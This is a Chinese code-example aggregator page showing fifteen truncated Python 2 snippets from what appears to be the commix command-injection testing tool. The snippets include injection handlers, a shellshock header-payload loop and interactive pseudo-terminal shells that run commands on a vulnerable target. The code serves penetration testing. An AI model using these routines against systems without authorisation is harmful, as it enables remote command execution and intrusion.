本文整理汇总了Python中src.utils.logs.logs_notification函数的典型用法代码示例。如果您正苦于以下问题:Python logs_notification函数的具体用法?Python logs_notification怎么用?Python logs_notification使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了logs_notification函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: input_cmd
def input_cmd(http_request_method, url, vuln_parameter, ip_src):
print "\nPseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
logs.logs_notification(filename)
os._exit(0)
elif cmd.lower() == "back":
os._exit(0)
else:
pass
else:
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
示例2: execute_file_based_technique
def execute_file_based_technique(url, delay, filename, http_request_method, url_time_response):
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) == False:
if http_request_method == "GET":
print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
else:
print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
if menu.options.verbose:
print "\n"
percent = colors.PURPLE + "FINISHED" + Style.RESET_ALL
sys.stdout.write(Style.BRIGHT + "\r(!) The process of testing the "+ menu.options.tech + " injection technique... " + Style.RESET_ALL + "[ " + percent + " ]")
sys.stdout.flush()
logs.logs_notification(filename)
sys.exit(0)
示例3: input_cmd
def input_cmd(http_request_method, url, vuln_parameter, ip_src):
print "\nPseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
logs.logs_notification(filename)
os._exit(0)
else:
cmd_exec(http_request_method, cmd, url, vuln_parameter, ip_src)
except KeyboardInterrupt:
print ""
os._exit(0)
except:
print ""
os._exit(0)
示例4: main
except httplib.BadStatusLine, e:
print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]"
print e.line, e.message
pass
else:
print Back.RED + "(x) Error: You must specify the target URL." + Style.RESET_ALL + "\n"
sys.exit(0)
# Check if defined "--proxy" option.
if menu.options.proxy:
proxy.do_check(url)
# Launch injection and exploitation controller.
controller.do_check(url, filename)
except KeyboardInterrupt:
print "\n" + Back.RED + "(x) Aborted: Ctrl-C was pressed!" + Style.RESET_ALL
logs.logs_notification(filename)
print ""
sys.exit(0)
except SystemExit:
print ""
sys.exit(0)
if __name__ == '__main__':
main()
#eof
示例5: tfb_injection_handler
#.........这里部分代码省略.........
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from /tmp
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(float_percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(float_percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if how_long == previous_how_long + delay:
if (len(TAG) == output_length) and (is_vulnerable == True):
found = True
no_result = False
is_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
示例6: tfb_injection_handler
#.........这里部分代码省略.........
continue
if not settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
except KeyboardInterrupt:
if 'cmd' in locals():
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
if not settings.VERBOSITY_LEVEL >= 1:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
info_msg = "Testing the " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
else:
percent = ""
else:
percent = str(float_percent) + "%"
print ""
# Print logs notification message
logs.logs_notification(filename)
#raise
else:
percent = str(float_percent) + "%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response == 0 and (how_long - delay) >= 0) or \
(url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \
(url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) :
if (len(TAG) == output_length) and \
(possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level):
found = True
no_result = False
if settings.LOAD_SESSION:
possibly_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " cookie"
found_vuln_parameter = vuln_parameter
the_type = " parameter"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
示例7: eb_injection_handler
#.........这里部分代码省略.........
else:
header_name = ""
the_type = " parameter"
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
if len(found_vuln_parameter) != 0 :
found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
# Check for any enumeration options.
eb_enumeration.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Check for any system file access options.
eb_file_access.do_check(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Check if defined single cmd.
if menu.options.os_cmd:
eb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, http_request_method, url, vuln_parameter)
# Pseudo-Terminal shell
go_back = False
while True:
if go_back == True:
break
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type '?' for shell options)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd.lower() in settings.SHELL_OPTIONS:
if cmd.lower() == "?":
menu.shell_options()
elif cmd.lower() == "quit":
logs.logs_notification(filename)
sys.exit(0)
elif cmd.lower() == "back":
go_back = True
break
else:
pass
else:
# The main command injection exploitation.
response = eb_injector.injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Command execution results.
shell = eb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell).replace(" ", "", 1)[:-1]
if shell != "":
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
else:
print "\n" + Back.RED + "(x) Error: The '" + cmd + "' command, does not return any output." + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例8: tfb_injection_handler
#.........这里部分代码省略.........
else:
percent = ""
else:
break
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
percent = ((num_of_chars * 100) / total)
if percent == 100:
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
break
else:
percent = str(percent)+"%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(percent)+"%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay) :
if len(TAG) == output_length:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
the_type = " HTTP header"
else:
header_name = ""
the_type = " parameter"
示例9: tfb_injection_handler
#.........这里部分代码省略.........
if not menu.options.verbose:
sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
if 'cmd' in locals():
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except SystemExit:
# Delete previous shell (text) files (output) from temp.
delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
if not menu.options.verbose:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
else:
percent = ""
else:
percent = str(float_percent) + "%"
#Print logs notification message
percent = Fore.BLUE + "FINISHED" + Style.RESET_ALL
sys.stdout.write("\r" + settings.INFO_SIGN + "Testing the " + technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
print ""
logs.logs_notification(filename)
raise
else:
percent = str(float_percent) + "%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response == 0 and (how_long - delay) >= 0) or \
(url_time_response != 0 and (how_long - delay) == 0 and (how_long == delay)) or \
(url_time_response != 0 and (how_long - delay) > 0 and (how_long >= delay + 1)) :
if (len(TAG) == output_length) and \
(is_vulnerable == True or settings.LOAD_SESSION and is_vulnerable == "True"):
found = True
no_result = False
if settings.LOAD_SESSION:
is_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
found_vuln_parameter = vuln_parameter
the_type = " HTTP header"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
found_vuln_parameter = ""
示例10: shellshock_handler
def shellshock_handler(url, http_request_method, filename):
counter = 1
vp_flag = True
no_result = True
export_injection_info = False
injection_type = "results-based command injection"
technique = "shellshock injection technique"
sys.stdout.write("(*) Testing the "+ technique + "... ")
sys.stdout.flush()
try:
i = 0
total = len(shellshock_cves) * len(headers)
for cve in shellshock_cves:
for check_header in headers:
i = i + 1
attack_vector = "echo " + cve + ":Done;"
payload = shellshock_payloads(cve, attack_vector)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)
header = {check_header : payload}
request = urllib2.Request(url, None, header)
response = urllib2.urlopen(request)
if not menu.options.verbose:
percent = ((i*100)/total)
if percent == 100:
if no_result == True:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
elif cve in response.info():
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vuln_parameter = "HTTP Header"
vp_flag = logs.add_parameter(vp_flag, filename, check_header, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
if cve in response.info():
no_result = False
print Style.BRIGHT + "\n(!) The ("+ check_header + ") '" + Style.UNDERLINE + url + Style.RESET_ALL + Style.BRIGHT + "' is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type.title() + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + "\"" + payload + "\"" + Style.RESET_ALL
# Enumeration options.
enumeration(url, cve, check_header)
# File access options.
file_access(url, cve, check_header)
if menu.options.os_cmd:
cmd = menu.options.os_cmd
shell = cmd_exec(url, cmd, cve, check_header)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
sys.exit(0)
else:
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print "\nPseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
logs.logs_notification(filename)
sys.exit(0)
else:
shell = cmd_exec(url, cmd, cve, check_header)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
except:
print ""
sys.exit(0)
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
#.........这里部分代码省略.........
示例11: tb_injection_handler
#.........这里部分代码省略.........
continue
if not settings.VERBOSITY_LEVEL >= 1:
info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
except KeyboardInterrupt:
raise
except SystemExit:
raise
except EOFError:
err_msg = "Exiting, due to EOFError."
print settings.print_error_msg(err_msg)
raise
except:
percent = ((num_of_chars * 100) / total)
float_percent = "{0:.1f}".format(round(((num_of_chars*100)/(total*1.0)),2))
if str(float_percent) == "100.0":
if no_result == True:
if not settings.VERBOSITY_LEVEL >= 1:
percent = Fore.RED + "FAILED" + Style.RESET_ALL
info_msg = "Testing the " + "(" + injection_type.split(" ")[0] + ") " + technique + "... " + "[ " + percent + " ]"
sys.stdout.write("\r" + settings.print_info_msg(info_msg))
sys.stdout.flush()
else:
percent = ""
else:
percent = str(float_percent) + "%"
print ""
# Print logs notification message
logs.logs_notification(filename)
#raise
else:
percent = str(float_percent) + "%"
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response == 0 and (how_long - timesec) >= 0) or \
(url_time_response != 0 and (how_long - timesec) == 0 and (how_long == timesec)) or \
(url_time_response != 0 and (how_long - timesec) > 0 and (how_long >= timesec + 1)) :
if (len(TAG) == output_length) and \
(possibly_vulnerable == True or settings.LOAD_SESSION and int(is_vulnerable) == menu.options.level):
found = True
no_result = False
# Check injection state
settings.DETECTION_PHASE = False
settings.EXPLOITATION_PHASE = True
if settings.LOAD_SESSION:
possibly_vulnerable = False
if settings.COOKIE_INJECTION == True:
header_name = " cookie"
found_vuln_parameter = vuln_parameter
the_type = " parameter"
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
found_vuln_parameter = ""
the_type = " HTTP header"
elif settings.REFERER_INJECTION == True:
示例12: tb_injection_handler
#.........这里部分代码省略.........
else:
percent = str(percent)+"%"
if not menu.options.verbose:
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
break
# Yaw, got shellz!
# Do some magic tricks!
if (url_time_response <= 1 and how_long >= delay) or \
(url_time_response >= 2 and how_long > delay):
if len(TAG) == output_length :
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
http_request_method = "cookie"
found_vuln_parameter = vuln_parameter
else:
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", urllib.unquote_plus(payload.replace("\n", "\\n"))) + Style.RESET_ALL
# Check for any enumeration options.
tb_enumeration.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Check for any system file access options.
tb_file_access.do_check(separator, maxlen, TAG, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
# Pseudo-Terminal shell
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
logs.logs_notification(filename)
sys.exit(0)
else:
# The main command injection exploitation.
check_how_long, output = tb_injector.injection(separator, maxlen, TAG, cmd, prefix, suffix, delay, http_request_method, url, vuln_parameter, alter_shell)
if menu.options.verbose:
print ""
if output != "" and check_how_long != 0 :
print "\n\n" + Fore.GREEN + Style.BRIGHT + output + Style.RESET_ALL
print "\n(*) Finished in "+ time.strftime('%H:%M:%S', time.gmtime(check_how_long)) +".\n"
else:
print ""
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
break
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
break
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例13: do_check
#.........这里部分代码省略.........
modules_handler.load_modules(url, http_request_method, filename)
# Cookie Injection
if settings.COOKIE_INJECTION == True:
header_name = " Cookie"
check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
the_type = " HTTP header "
# User-Agent Injection
elif settings.USER_AGENT_INJECTION == True:
header_name = " User-Agent"
check_parameter = ""
the_type = " HTTP header "
# Referer Injection
elif settings.REFERER_INJECTION == True:
header_name = " Referer"
check_parameter = ""
the_type = " HTTP header "
else :
pass
if len(check_parameter) != 0 :
check_parameter = " '" + check_parameter + "'"
print "(*) Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(url, delay)
# Check all injection techniques
if not menu.options.tech:
# Check if it is vulnerable to classic command injection technique.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
# Check if it is vulnerable to eval-based command injection technique.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
# Check if it is vulnerable to time-based blind command injection technique.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
# Check if it is vulnerable to file-based semiblind command injection technique.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
else:
# Check if it is vulnerable to classic command injection technique.
if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
# Check if classic results-based command injection technique succeeds.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
elif menu.options.tech == "classic":
cb_handler.exploitation(url, delay, filename, http_request_method)
else:
classic_state = False
# Check if it is vulnerable to eval-based command injection technique.
if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
# Check if eval-based command injection technique succeeds.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
elif menu.options.tech == "eval-based":
eb_handler.exploitation(url, delay, filename, http_request_method)
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
# Check if time-based blind command injection technique succeeds.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
elif menu.options.tech == "time-based":
tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
# Check if file-based semiblind command injection technique succeeds.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
elif menu.options.tech == "file-based":
fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
file_based_state = False
if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
if http_request_method == "GET":
print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
else:
print Back.RED + "(x) The '"+ parameter +"' parameter appear to be not injectable." + Style.RESET_ALL
else:
logs.logs_notification(filename)
sys.exit(0)
#eof
示例14: cb_injection_handler
#.........这里部分代码省略.........
percent = Fore.RED + "FAILED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
elif len(shell) != 0:
percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
else:
percent = str(percent)+"%"
sys.stdout.write("\r(*) Testing the "+ technique + "... " + "[ " + percent + " ]")
sys.stdout.flush()
except KeyboardInterrupt:
raise
except:
continue
# Yaw, got shellz!
# Do some magic tricks!
if shell:
found = True
no_result = False
if settings.COOKIE_INJECTION == True:
http_request_method = "cookie"
found_vuln_parameter = vuln_parameter
else:
if http_request_method == "GET":
found_vuln_parameter = parameters.vuln_GET_param(url)
else :
found_vuln_parameter = vuln_parameter
# Print the findings to log file.
if export_injection_info == False:
export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
if vp_flag == True:
vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
logs.upload_payload(filename, counter, payload)
counter = counter + 1
# Print the findings to terminal.
print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
print " (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
print " (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
print " (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
# Check for any enumeration options.
cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# Check for any system file access options.
cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# Pseudo-Terminal shell
while True:
gotshell = raw_input("\n(?) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
if gotshell in settings.CHOISE_YES:
print ""
print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
while True:
try:
cmd = raw_input("Shell > ")
if cmd == "q":
logs.logs_notification(filename)
sys.exit(0)
else:
# Command execution results.
response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate injection results.
shell = cb_injector.injection_results(response, TAG)
if shell:
shell = "".join(str(p) for p in shell)
print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
except KeyboardInterrupt:
raise
elif gotshell in settings.CHOISE_NO:
if menu.options.verbose:
sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
sys.stdout.flush()
break
else:
if gotshell == "":
gotshell = "enter"
print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
pass
if no_result == True:
print ""
return False
else :
sys.stdout.write("\r")
sys.stdout.flush()
示例15: do_check
#.........这里部分代码省略.........
time_based_state = False
file_based_state = False
# Check if defined "--delay" option.
if menu.options.delay:
delay = menu.options.delay
else:
delay = settings.DELAY
# Do authentication if needed.
if menu.options.auth_url and menu.options.auth_data:
authentication.auth_process()
elif menu.options.auth_url or menu.options.auth_data:
print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
sys.exit(0)
else:
pass
# Check if HTTP Method is POST.
if not menu.options.data:
http_request_method = "GET"
else:
http_request_method = "POST"
parameter = menu.options.data
# Load modules
modules_handler.load_modules(url, http_request_method, filename)
# Estimating the response time (in seconds)
delay, url_time_response = requests.estimate_response_time(url, delay)
# Check all injection techniques
if not menu.options.tech:
# Check if it is vulnerable to classic command injection technique.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
# Check if it is vulnerable to eval-based command injection technique.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
# Check if it is vulnerable to time-based blind command injection technique.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
# Check if it is vulnerable to file-based semiblind command injection technique.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
else:
# Check if it is vulnerable to classic command injection technique.
if "classic" in menu.options.tech or len(menu.options.tech) <= 4 and "c" in menu.options.tech:
# Check if classic results-based command injection technique succeeds.
if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
classic_state = True
elif menu.options.tech == "classic":
cb_handler.exploitation(url, delay, filename, http_request_method)
else:
classic_state = False
# Check if it is vulnerable to eval-based command injection technique.
if "eval-based" in menu.options.tech or len(menu.options.tech) <= 4 and "e" in menu.options.tech:
# Check if eval-based command injection technique succeeds.
if eb_handler.exploitation(url, delay, filename, http_request_method) != False:
eval_based_state = True
elif menu.options.tech == "eval-based":
eb_handler.exploitation(url, delay, filename, http_request_method)
else:
eval_based_state = False
# Check if it is vulnerable to time-based blind command injection technique.
if "time-based" in menu.options.tech or len(menu.options.tech) <= 4 and "t" in menu.options.tech:
# Check if time-based blind command injection technique succeeds.
if tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
time_based_state = True
elif menu.options.tech == "time-based":
tb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
time_based_state = False
# Check if it is vulnerable to file-based semiblind command injection technique.
if "file-based" in menu.options.tech or len(menu.options.tech) <= 4 and "f" in menu.options.tech:
# Check if file-based semiblind command injection technique succeeds.
if fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response) != False:
file_based_state = True
elif menu.options.tech == "file-based":
fb_handler.exploitation(url, delay, filename, http_request_method, url_time_response)
else:
file_based_state = False
if classic_state == False and eval_based_state == False and time_based_state == False and file_based_state == False :
if http_request_method == "GET":
print Back.RED + "(x) The url '"+ url +"' appear to be not injectable." + Style.RESET_ALL
else:
